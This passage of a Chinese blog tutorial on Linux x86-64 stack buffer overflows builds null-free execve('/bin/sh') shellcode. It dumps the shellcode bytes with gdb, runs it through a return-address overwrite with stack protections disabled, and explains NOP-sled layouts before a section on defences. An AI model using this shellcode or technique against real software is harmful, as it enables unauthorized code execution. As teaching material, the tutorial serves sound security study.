%rdi\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;syscall\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mycall: call func\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;.string \&quot;/bin/sh\&quot;&quot;</span></span><br><span class="line">        );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>试着编译运行一下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ gcc shellcode_test.c -o shellcode_test</span><br><span class="line">$ ./shellcode_test </span><br><span class="line">sh-4.4<span class="comment"># exit</span></span><br><span class="line"><span class="built_in">exit</span></span><br><span class="line">$</span><br></pre></td></tr></table></figure>

<p>Wow，我们的shellcode完全可行，但是现在还并没有结束。众所周知，程序在内存中都是以二进制的形式保存的，我们的程序也不例外，因为我们需要将我们的shellcode传递到缓冲区中去，如果直接传递代码，那显然是不行的，我们要传递的应该是编译生成的二进制才对，这样在目标机器上直接就可以执行。现在，我们使用gdb将我们的程序转换为二进制（确切的说应该是16进制，不过都一样嘛）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">$ gdb gdb shellcode_test</span><br><span class="line">....</span><br><span class="line">gdb-peda$ disassemble main </span><br><span class="line">Dump of assembler code <span class="keyword">for</span> <span class="keyword">function</span> main:</span><br><span class="line">   0x00000000000005fa &lt;+0&gt;:	push   %rbp</span><br><span class="line">   0x00000000000005fb &lt;+1&gt;:	mov    %rsp,%rbp</span><br><span class="line">   0x00000000000005fe &lt;+4&gt;:	jmp    0x639 &lt;main+63&gt;</span><br><span class="line">   0x0000000000000600 &lt;+6&gt;:	pop    %rbx</span><br><span class="line">   0x0000000000000601 &lt;+7&gt;:	mov    %rbx,0x8(%rsp)</span><br><span class="line">   0x0000000000000606 &lt;+12&gt;:	movb   <span class="variable">$0x0</span>,0x7(%rsp)</span><br><span class="line">   0x000000000000060b &lt;+17&gt;:	movl   <span class="variable">$0x0</span>,0x10(%rsp)</span><br><span class="line">   0x0000000000000613 &lt;+25&gt;:	mov    <span class="variable">$0x3b</span>,%rax</span><br><span class="line">   0x000000000000061a &lt;+32&gt;:	mov    %rbx,%rdi</span><br><span class="line">   0x000000000000061d &lt;+35&gt;:	lea    0x8(%rsp),%rsi</span><br><span class="line">   0x0000000000000622 &lt;+40&gt;:	lea    0x10(%rsp),%rdx</span><br><span class="line">   0x0000000000000627 &lt;+45&gt;:	syscall </span><br><span class="line">   0x0000000000000629 &lt;+47&gt;:	mov    <span class="variable">$0x3c</span>,%rax</span><br><span class="line">   0x0000000000000630 &lt;+54&gt;:	mov    <span class="variable">$0x0</span>,%rdi</span><br><span class="line">   0x0000000000000637 &lt;+61&gt;:	syscall </span><br><span class="line">   0x0000000000000639 &lt;+63&gt;:	callq  0x600 &lt;main+6&gt;</span><br><span class="line">   0x000000000000063e &lt;+68&gt;:	(bad)  </span><br><span class="line">   0x000000000000063f &lt;+69&gt;:	(bad)  </span><br><span class="line">   0x0000000000000640 &lt;+70&gt;:	imul   <span class="variable">$0x90006873</span>,0x2f(%rsi),%ebp</span><br><span class="line">   0x0000000000000647 &lt;+77&gt;:	pop    %rbp</span><br><span class="line">   0x0000000000000648 &lt;+78&gt;:	retq   </span><br><span class="line">End of assembler dump.</span><br><span class="line">gdb-peda$ x /64xb main+4</span><br><span class="line">0x5fe &lt;main+4&gt;:	0xeb	0x39	0x5b	0x48	0x89	0x5c	0x24	0x08</span><br><span class="line">0x606 &lt;main+12&gt;:	0xc6	0x44	0x24	0x07	0x00	0xc7	0x44	0x24</span><br><span class="line">0x60e &lt;main+20&gt;:	0x10	0x00	0x00	0x00	0x00	0x48	0xc7	0xc0</span><br><span class="line">0x616 &lt;main+28&gt;:	0x3b	0x00	0x00	0x00	0x48	0x89	0xdf	0x48</span><br><span class="line">0x61e &lt;main+36&gt;:	0x8d	0x74	0x24	0x08	0x48	0x8d	0x54	0x24</span><br><span class="line">0x626 &lt;main+44&gt;:	0x10	0x0f	0x05	0x48	0xc7	0xc0	0x3c	0x00</span><br><span class="line">0x62e &lt;main+52&gt;:	0x00	0x00	0x48	0xc7	0xc7	0x00	0x00	0x00</span><br><span class="line">0x636 &lt;main+60&gt;:	0x00	0x0f	0x05	0xe8	0xc2	0xff	0xff	0xff</span><br></pre></td></tr></table></figure>

<p>可以看到，除了字符串以外，我们的程序是从第4行到第63行，由于字符串在内存中保存的是ascii码，这里也就不需要获取其二进制了。</p>
<p>好了，现在我们已经有了shellcode的二进制了，但是还有一个问题。可以看到，我们的程序中有0x00这种数据，由于我们的shellcode作为字符串传递到缓冲区中的，这代表的恰恰也是字符串的结束，也就是说，当我们的字符串往缓冲区拷贝的时候，当遇到0x00时，无论我们的shellcode有没有拷贝完，都会停止拷贝。我们可不想我们费尽千辛万苦写出的shellcode竟然只被拷贝的残缺不全。下面，我们改进一下我们的程序。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">shellcode_test1.c</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    __asm__(</span><br><span class="line">        <span class="string">&quot;jmp mycall\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;func: pop %rbx\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mov %rbx, 0x8(%rsp)\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;xor %rax, %rax\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;movb %al, 0x7(%rsp)\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;movl %eax, 0x10(%rsp)\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;movb $0x3b, %al\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mov %rbx, %rdi\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;lea 0x8(%rsp), %rsi\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;lea 0x10(%rsp), %rdx\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;syscall\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;xor %rdi, %rdi\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;xor %rax, %rax\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;movb $60, %al\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;syscall\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mycall: call func\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;.string \&quot;/bin/sh\&quot;&quot;</span></span><br><span class="line">        );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>对照shellcode_test.c，我们只是改变了一些赋值操作。让我们看一下效果。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">$ gcc shellcode_test1.c -o shellcode_test1</span><br><span class="line">$ gdb shellcode_test1</span><br><span class="line">...</span><br><span class="line">gdb-peda$ disassemble main </span><br><span class="line">Dump of assembler code <span class="keyword">for</span> <span class="keyword">function</span> main:</span><br><span class="line">   0x00000000000005fa &lt;+0&gt;:	push   %rbp</span><br><span class="line">   0x00000000000005fb &lt;+1&gt;:	mov    %rsp,%rbp</span><br><span class="line">   0x00000000000005fe &lt;+4&gt;:	jmp    0x62c &lt;main+50&gt;</span><br><span class="line">   0x0000000000000600 &lt;+6&gt;:	pop    %rbx</span><br><span class="line">   0x0000000000000601 &lt;+7&gt;:	mov    %rbx,0x8(%rsp)</span><br><span class="line">   0x0000000000000606 &lt;+12&gt;:	xor    %rax,%rax</span><br><span class="line">   0x0000000000000609 &lt;+15&gt;:	mov    %al,0x7(%rsp)</span><br><span class="line">   0x000000000000060d &lt;+19&gt;:	mov    %eax,0x10(%rsp)</span><br><span class="line">   0x0000000000000611 &lt;+23&gt;:	mov    <span class="variable">$0x3b</span>,%al</span><br><span class="line">   0x0000000000000613 &lt;+25&gt;:	mov    %rbx,%rdi</span><br><span class="line">   0x0000000000000616 &lt;+28&gt;:	lea    0x8(%rsp),%rsi</span><br><span class="line">   0x000000000000061b &lt;+33&gt;:	lea    0x10(%rsp),%rdx</span><br><span class="line">   0x0000000000000620 &lt;+38&gt;:	syscall </span><br><span class="line">   0x0000000000000622 &lt;+40&gt;:	xor    %rdi,%rdi</span><br><span class="line">   0x0000000000000625 &lt;+43&gt;:	xor    %rax,%rax</span><br><span class="line">   0x0000000000000628 &lt;+46&gt;:	mov    <span class="variable">$0x3c</span>,%al</span><br><span class="line">   0x000000000000062a &lt;+48&gt;:	syscall </span><br><span class="line">   0x000000000000062c &lt;+50&gt;:	callq  0x600 &lt;main+6&gt;</span><br><span class="line">   0x0000000000000631 &lt;+55&gt;:	(bad)  </span><br><span class="line">   0x0000000000000632 &lt;+56&gt;:	(bad)  </span><br><span class="line">   0x0000000000000633 &lt;+57&gt;:	imul   <span class="variable">$0x90006873</span>,0x2f(%rsi),%ebp</span><br><span class="line">   0x000000000000063a &lt;+64&gt;:	pop    %rbp</span><br><span class="line">   0x000000000000063b &lt;+65&gt;:	retq   </span><br><span class="line">End of assembler dump.</span><br><span class="line">gdb-peda$ x /51xb main+4</span><br><span class="line">0x5fe &lt;main+4&gt;:	0xeb	0x2c	0x5b	0x48	0x89	0x5c	0x24	0x08</span><br><span class="line">0x606 &lt;main+12&gt;:	0x48	0x31	0xc0	0x88	0x44	0x24	0x07	0x89</span><br><span class="line">0x60e &lt;main+20&gt;:	0x44	0x24	0x10	0xb0	0x3b	0x48	0x89	0xdf</span><br><span class="line">0x616 &lt;main+28&gt;:	0x48	0x8d	0x74	0x24	0x08	0x48	0x8d	0x54</span><br><span class="line">0x61e &lt;main+36&gt;:	0x24	0x10	0x0f	0x05	0x48	0x31	0xff	0x48</span><br><span class="line">0x626 &lt;main+44&gt;:	0x31	0xc0	0xb0	0x3c	0x0f	0x05	0xe8	0xcf</span><br><span class="line">0x62e &lt;main+52&gt;:	0xff	0xff	0xff </span><br></pre></td></tr></table></figure>

<p>现在，我们的shellcode中已经没有0x00了，并且还变短了呢。</p>
<p>现在，我们试一试这个shellcode作为字符串能否运行。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">shellcode.c</span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> shellcode[] = <span class="string">&quot;\xeb\x2c\x5b\x48\x89\x5c\x24\x08\x48\x31\xc0\x88\x44\x24\x07\x89\x44\x24&quot;</span></span><br><span class="line">                   <span class="string">&quot;\x10\xb0\x3b\x48\x89\xdf\x48\x8d\x74\x24\x08\x48\x8d\x54\x24\x10\x0f\x05&quot;</span></span><br><span class="line">                   <span class="string">&quot;\x48\x31\xff\x48\x31\xc0\xb0\x3c\x0f\x05\xe8\xcf\xff\xff\xff/bin/sh&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">test</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">long</span>  *ret;</span><br><span class="line">    ret = (<span class="keyword">long</span> *)&amp;ret + <span class="number">2</span>;</span><br><span class="line">    (*ret) = (<span class="keyword">long</span>)shellcode;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    test();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ gcc -z execstack -fno-stack-protector -o shellcode shellcode.c</span><br><span class="line">$ ./shellcode</span><br><span class="line">sh-4.4<span class="comment"># exit</span></span><br><span class="line"><span class="built_in">exit</span></span><br><span class="line">$</span><br></pre></td></tr></table></figure>

<p>哈，完全可以运行。</p>
<h2 id="使用shellcode"><a href="#使用shellcode" class="headerlink" title="使用shellcode"></a>使用shellcode</h2><p>现在，我们已经有了shellcode，我们在前面也提供了一种攻击思路，但是最终的困难却在于我们该如何利用缓冲区溢出来修改返回地址，说实话，到现在为止，博主并没有找到一个优雅的、简单的修改返回地址的方法。在我所看的一些文章中，唯一的方法就是“试”，这当然还需要靠点运气，更何况现在操作系统一般采用栈随机化，并不好“试”。</p>
<p>一种比较好的方法是在shellcode前面加上许多<code>nop</code>指令，并在后面加上许多要覆盖的返回地址。由于<code>nop</code>代表空指令，且只占一个字节，不管我们的返回地址返回到shellcode前面的任何一个<code>nop</code>，程序都会执行到shellcode所在的地方，而不必非要返回到shellcode的开头处，这会大大增加shellcode被执行的机率。</p>
<img src="/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA5.jpg" class="">

<p>但是，这对一些比较小的缓冲区却并不是很适用，因为比较小的缓冲区并不能有太多了<code>nop</code>或者太长的shellcode，否则返回地址直接被shellcode或者甚至被nop给覆盖了，在别处看到的是，解决这类小缓冲区的方法也很简单，我们把返回地址放在前面，<code>nop</code>放在中间，shellcode放在最后面，就像这样：</p>
<img src="/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA6.jpg" class="">

<p>这样理论上，<code>nop</code>可以很多，执行shellcode的机会也会大大增加。</p>
<h2 id="防范"><a href="#防范" class="headerlink" title="防范"></a>防范</h2><p>现代编译器已经加入了许多防范缓冲区溢出的机制，例如缓冲区溢出检查（还记的我前面卖的关子吗？我们使用了gcc的-fno-stack-protector参数，就是让编译器不要加入这种机制，以免干扰我们的实验。）、禁止栈内执行代码（shellcode.c编译时所用的-z execstack，该参数是允许栈内代码执行）。缓冲区溢出检查是指在栈上的局部变量分配之前，先分配一些空间保存某个数，当在程序返回之前，先检查这个数有没有被改变，若被改变了，则立即触发中断，防止去执行shellcode。另外，现代操作系统也加入了许多措施来阻止缓冲区溢出，比如栈的随机化（这又大大降低了我们“猜”中返回地址的机率）。</p>
<p>但是，尽管操作系统和编译器都加入了如此多的机制来防范缓冲区溢出，但是，攻击者总还是有种种办法绕过这些机制，所以，要从根本上杜绝缓冲区溢出，还是要从我们写程序入手，在对缓冲区操作前，一定要对其操作的范围进行限制，不要使用那些危险的函数，比如<code>gets</code>、不限制长度的<code>strcpy</code>等等。</p>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>程序依靠栈来执行，并将局部变量分配在栈上，<code>call</code>指令也将返回地址放在栈上，这是可以进行缓冲区溢出的前提。</p>
<p>缓冲区溢出是通过覆盖返回地址，进而去执行攻击程序（shellcode）来实现的。</p>
<p>shellcode编写完成后要转换为二进制（16进制）数据，且不得出现0x00，这代表了字符串的结束</p>
<p>防范缓冲区溢出要使用正确的编译选项，更重要的是正确的编写程序。</p>
<hr>
<p>完</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Linux/" rel="tag"># Linux</a>
              <a href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/" rel="tag"># 信息安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/09/02/Linux%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E8%A1%A8%EF%BC%88x86-64%EF%BC%89/" rel="prev" title="Linux系统调用表（x86_64）">
      <i class="fa fa-chevron-left"></i> Linux系统调用表（x86_64）
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/10/08/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/" rel="next" title="正则表达式">
      正则表达式 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%9B%E7%A8%8B"><span class="nav-number">2.</span> <span class="nav-text">进程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%88"><span class="nav-number">3.</span> <span class="nav-text">栈</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%94%B9%E5%8F%98%E7%A8%8B%E5%BA%8F%E7%9A%84%E8%BF%94%E5%9B%9E%E5%9C%B0%E5%9D%80"><span class="nav-number">4.</span> <span class="nav-text">改变程序的返回地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E8%BF%94%E5%9B%9E%E5%9C%B0%E5%9D%80"><span class="nav-number">5.</span> <span class="nav-text">覆盖返回地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#shellcode"><span class="nav-number">6.</span> <span class="nav-text">shellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8shellcode"><span class="nav-number">7.</span> <span class="nav-text">使用shellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%98%B2%E8%8C%83"><span class="nav-number">8.</span> <span class="nav-text">防范</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-number">9.</span> <span class="nav-text">小结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="清欢"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">清欢</p>
  <div class="site-description" itemprop="description">一个被遗忘的笔记本</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">清欢</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  

</body>
</html>
